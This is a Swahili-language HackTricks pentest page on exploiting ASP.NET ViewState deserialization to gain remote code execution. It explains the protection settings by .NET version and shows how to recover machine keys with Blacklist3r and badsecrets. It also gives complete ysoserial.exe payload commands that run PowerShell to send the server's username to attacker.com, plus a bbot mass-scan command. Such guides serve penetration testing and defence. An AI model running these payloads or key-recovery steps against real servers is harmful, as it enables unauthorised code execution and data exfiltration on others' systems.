Exploiting __VIEWSTATE without knowing the secrets

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

Mwongozo wa tuzo ya mdudu: jiandikishe kwa Intigriti, jukwaa la tuzo za mdudu za malipo lililoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo hadi $100,000!

Ni nini ViewState

ViewState hutumika kama mbinu ya msingi katika ASP.NET kudumisha data ya ukurasa na udhibiti kati ya kurasa za wavuti. Wakati wa kurekebisha HTML ya ukurasa, hali ya sasa ya ukurasa na thamani za kuhifadhiwa wakati wa postback zinahifadhiwa katika herufi zilizosimbwa kwa msingi wa base64. Herufi hizi kisha hutiwa katika maeneo ya ViewState yaliyofichwa.

Maelezo ya ViewState yanaweza kuchorwa na mali zifuatazo au mchanganyiko wao:

  • Base64:

  • Muundo huu hutumiwa wakati sifa za EnableViewStateMac na ViewStateEncryptionMode zote zimewekwa kama uwongo.

  • Base64 + MAC (Message Authentication Code) Imewezeshwa:

  • Kuwezesha MAC kunafikiwa kwa kuweka sifa ya EnableViewStateMac kuwa kweli. Hii hutoa uthibitisho wa uadilifu kwa data ya ViewState.

  • Base64 + Imesimbwa:

  • Ufichaji unatumika wakati sifa ya ViewStateEncryptionMode inawekwa kuwa kweli, ikidumisha usiri wa data ya ViewState.

Kesi za Majaribio

Picha ni jedwali linaloelezea miundo tofauti ya ViewState katika ASP.NET kulingana na toleo la mfumo wa .NET. Hapa kuna muhtasari wa yaliyomo:

  1. Kwa toleo lolote la .NET, wakati MAC na Ufichaji wote wamelemazwa, MachineKey haihitajiki, na hivyo hakuna njia inayofaa ya kuitambua.

  2. Kwa toleo chini ya 4.5, ikiwa MAC imewezeshwa lakini Ufichaji haujafanywa, MachineKey inahitajika. Njia ya kutambua MachineKey inaitwa "Blacklist3r."

  3. Kwa toleo chini ya 4.5, bila kujali ikiwa MAC imewezeshwa au la, ikiwa Ufichaji umewezeshwa, MachineKey inahitajika. Kutambua MachineKey ni kazi ya "Blacklist3r - Maendeleo ya Baadaye."

  4. Kwa toleo 4.5 na zaidi, mchanganyiko wote wa MAC na Ufichaji (iwe wote ni kweli, au moja ni kweli na nyingine ni uwongo) unahitaji MachineKey. MachineKey inaweza kutambuliwa kwa kutumia "Blacklist3r."

Kesi ya Jaribio: 1 – EnableViewStateMac=false na viewStateEncryptionMode=false

Pia ni rahisi kulemaza ViewStateMAC kabisa kwa kuweka funguo ya usajili ya AspNetEnforceViewStateMac kuwa sifuri katika:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\v{VersionHere}

Kutambua Atributi za ViewState

Unaweza jaribu kutambua ikiwa ViewState inalindwa na MAC kwa kuchukua ombi lenye parameter hii na BurpSuite. Ikiwa Mac haikutumika kulinda parameter unaweza kuitumia kwa kutumia YSoSerial.Net

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

Kesi ya majaribio 1.5 - Kama Kesi ya majaribio 1 lakini kuki ya ViewState haikutumwa na seva

Wabunifu wanaweza kuondoa ViewState isishiriki katika Ombi la HTTP (mtumiaji hataipokea kuki hii). Mtu anaweza kudhani kwamba ikiwa ViewState haipo, utekelezaji wao ni salama kutoka kwa udhaifu wowote unaoweza kutokea na deserialization ya ViewState. Walakini, hilo sio jambo. Ikiwa tunaweza ViewState parameter kwa mwili wa ombi na kutuma mzigo wetu uliosanidiwa kwa kutumia ysoserial, bado tutaweza kufikia utekelezaji wa nambari kama ilivyoonyeshwa katika Kesi 1.

Kesi ya Majaribio: 2 - .Net < 4.5 na EnableViewStateMac=true & ViewStateEncryptionMode=false

Ili kuwezesha ViewState MAC kwa ukurasa maalum tunahitaji kufanya mabadiliko yafuatayo kwenye faili maalum ya aspx:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="hello.aspx.cs" Inherits="hello" enableViewStateMac="True"%>

Tunaweza pia kufanya hivyo kwa maombi ya jumla kwa kuweka kwenye faili ya web.config kama inavyoonyeshwa hapa chini:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.web>
<customErrors mode="Off" />
<machineKey validation="SHA1" validationKey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45" />
<pages enableViewStateMac="true" />
</system.web>
</configuration>

Kwa kuwa parameter hulindwa na MAC wakati huu ili kutekeleza shambulizi kwa mafanikio kwanza tunahitaji kutumia Blacklist3r(AspDotNetWrapper.exe) ili kupata ufunguo uliotumiwa.

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwUKLTkyMTY0MDUxMg9kFgICAw8WAh4HZW5jdHlwZQUTbXVsdGlwYXJ0L2Zvcm0tZGF0YWRkbdrqZ4p5EfFa9GPqKfSQRGANwLs= --decrypt --purpose=viewstate --modifier=6811C9FF --macdecode --TargetPagePath "/Savings-and-Investments/Application/ContactDetails.aspx" -f out.txt --IISDirPath="/"

--encrypteddata : __VIEWSTATE parameter value of the target application
--modifier : __VIWESTATEGENERATOR parameter value

Badsecrets ni chombo kingine kinachoweza kutambua machineKeys za kujulikana. Imeandikwa kwa Python, hivyo tofauti na Blacklist3r, hakuna tegemezi la Windows. Kwa viewstates za .NET, kuna zana ya "python blacklist3r", ambayo ni njia ya haraka zaidi ya kutumia.

Inaweza kutolewa na viewstate na jenereta moja kwa moja:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --viewstate /wEPDwUJODExMDE5NzY5ZGQMKS6jehX5HkJgXxrPh09vumNTKQ== --generator EDD8C9AE

Au, inaweza kuunganisha moja kwa moja kwenye URL ya lengo na kujaribu kukata viewstate kutoka kwenye HTML:

pip install badsecrets
git clone https://github.com/blacklanternsecurity/badsecrets
cd badsecrets
python examples/blacklist3r.py --url http://vulnerablesite/vulnerablepage.aspx

Ili kutafuta viewstates zenye kasoro kwa kiwango kikubwa, kwa kushirikiana na uchunguzi wa subdomain, moduli ya badsecrets BBOT inaweza kutumika:

bbot -f subdomain-enum -m badsecrets -t evil.corp

Ikiwa una bahati na ufunguo unapatikana, unaweza kuendelea na shambulio kwa kutumia YSoSerial.Net:

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=CA0B0334 --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

--generator = {__VIWESTATEGENERATOR parameter value}

Katika kesi ambapo parameter _VIEWSTATEGENERATOR haikutumwa na server huohuo hutahitaji kutoa parameter --generator lakini hizi:

--apppath="/" --path="/hello.aspx"

Kesi ya Majaribio: 3 – .Net < 4.5 na EnableViewStateMac=true/false na ViewStateEncryptionMode=true

Katika hii haijulikani ikiwa parameter imekingwa na MAC. Kisha, thamani labda imefichwa na utahitaji Machine Key kuweza kuficha mzigo wako ili kutumia udhaifu.

Katika kesi hii Blacklist3r moduli iko chini ya maendeleo...

Kabla ya .NET 4.5, ASP.NET inaweza kukubali ___VIEWSTATE_parameter bila kufichwa kutoka kwa watumiaji hata ikiwa ViewStateEncryptionMode imewekwa kuwa Always. ASP.NET inafanya ukaguzi wa uwepo wa parameter ya __VIEWSTATEENCRYPTED katika ombi. Ikiwa mtu ataondoa parameter hii, na kutuma mzigo usiofichwa, bado utashughulikiwa.

Hivyo basi ikiwa wachomaji wanapata njia ya kupata Machinekey kupitia udhaifu mwingine kama vile upitishaji wa faili, YSoSerial.Net amri iliyotumiwa katika Kesi 2, inaweza kutumika kufanya RCE kwa kutumia udhaifu wa deserialization ya ViewState.

  • Ondoa parameter ya __VIEWSTATEENCRYPTED kutoka kwa ombi ili kutumia udhaifu wa deserialization ya ViewState, vinginevyo itarudisha kosa la uthibitisho wa Viewstate MAC na jaribio litashindwa.

Kesi ya Majaribio: 4 – .Net >= 4.5 na EnableViewStateMac=true/false na ViewStateEncryptionMode=true/false isipokuwa sifa zote mbili kuwa za uwongo

Tunaweza kulazimisha matumizi ya mfumo wa ASP.NET kwa kutaja parameter ifuatayo ndani ya faili ya web.config kama inavyoonyeshwa hapa chini.

<httpRuntime targetFramework="4.5" />

Vinginevyo, hii inaweza kufanywa kwa kufafanua chaguo lifuatalo ndani ya paramita ya machineKey ya faili ya web.config.

compatibilityMode="Framework45"

Kama ilivyokuwa hapo awali thamani imefichwa. Kisha, ili kutuma mzigo sahihi, muhalifu anahitaji ufunguo.

Unaweza kujaribu kutumia Blacklist3r(AspDotNetWrapper.exe) kupata ufunguo unaotumiwa:

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata bcZW2sn9CbYxU47LwhBs1fyLvTQu6BktfcwTicOfagaKXho90yGLlA0HrdGOH6x/SUsjRGY0CCpvgM2uR3ba1s6humGhHFyr/gz+EP0fbrlBEAFOrq5S8vMknE/ZQ/8NNyWLwg== --decrypt --purpose=viewstate  --valalgo=sha1 --decalgo=aes --IISDirPath "/" --TargetPagePath "/Content/default.aspx"

--encrypteddata = {__VIEWSTATE parameter value}
--IISDirPath = {Directory path of website in IIS}
--TargetPagePath = {Target page path in application}

Kwa maelezo zaidi kuhusu IISDirPath na TargetPagePath rejea hapa

Au, kwa kutumia Badsecrets (na thamani ya jenereta):

cd badsecrets
python examples/blacklist3r.py --viewstate JLFYOOegbdXmPjQou22oT2IxUwCAzSA9EAxD6+305e/4MQG7G1v5GI3wL7D94W2OGpVGrI2LCqEwDoS/8JkE0rR4ak0= --generator B2774415

Baada ya kutambua funguo halali ya Mashine, hatua inayofuata ni kuzalisha mzigo uliosimbwa kwa kutumia YSoSerial.Net

ysoserial.exe -p ViewState  -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/content/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="F6722806843145965513817CEBDECBB1F94808E4A6C0B2F2"  --validationalg="SHA1" --validationkey="C551753B0325187D1759B4FB055B44F7C5077B016C02AF674E8DE69351B69FEFD045A267308AA2DAB81B69919402D7886A6E986473EEEC9556A9003357F5ED45"

Ikiwa una thamani ya __VIEWSTATEGENERATOR unaweza jaribu kutumia parameter --generator na thamani hiyo na punguza paramita --path na --apppath

Udanganyifu mafanikio wa udhaifu wa deserialization wa ViewState utasababisha ombi la nje ya mpangilio kwenye seva inayodhibitiwa na mshambuliaji, ambayo inajumuisha jina la mtumiaji. Aina hii ya udanganyifu inadhihirishwa katika uthibitisho wa dhana (PoC) ambao unaweza kupatikana kupitia rasilimali iliyo na jina "Exploiting ViewState Deserialization using Blacklist3r and YsoSerial.NET". Kwa maelezo zaidi juu ya jinsi mchakato wa udanganyifu unavyofanya kazi na jinsi ya kutumia zana kama Blacklist3r kwa kutambua MachineKey, unaweza kupitia PoC ya Udanganyifu Mafanikio.

Kesi ya Majaribio 6 – ViewStateUserKeys inatumika

Mali ya ViewStateUserKey inaweza kutumika kwa kujilinda dhidi ya mshambulizi wa CSRF. Ikiwa funguo kama hizo zimefafanuliwa katika programu na jaribu kuzalisha mzigo wa ViewState na njia zilizojadiliwa hadi sasa, mzigo hautasindika na programu. Unahitaji kutumia paramita moja zaidi ili kuunda kwa usahihi mzigo:

--viewstateuserkey="randomstringdefinedintheserver"

Matokeo ya Utekaji Mafanikio

Kwa kila kesi ya majaribio, ikiwa mzigo wa ViewState wa YSoSerial.Net unafanya kazi kwa mafanikio basi server itajibu na "Hitilafu ya seva ya ndani 500" ikiwa na maudhui ya jibu "Taarifa ya hali ni batili kwa ukurasa huu na inaweza kuwa imeharibika" na tutapata ombi la OOB.

Angalia kwa taarifa zaidi hapa

Marejeo

Mwongozo wa tuzo ya mdudu: jiandikishe kwa Intigriti, jukwaa la tuzo za mdudu za malipo lililoundwa na wadukuzi, kwa wadukuzi! Jiunge nasi kwenye https://go.intigriti.com/hacktricks leo, na anza kupata tuzo hadi $100,000!

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Last updated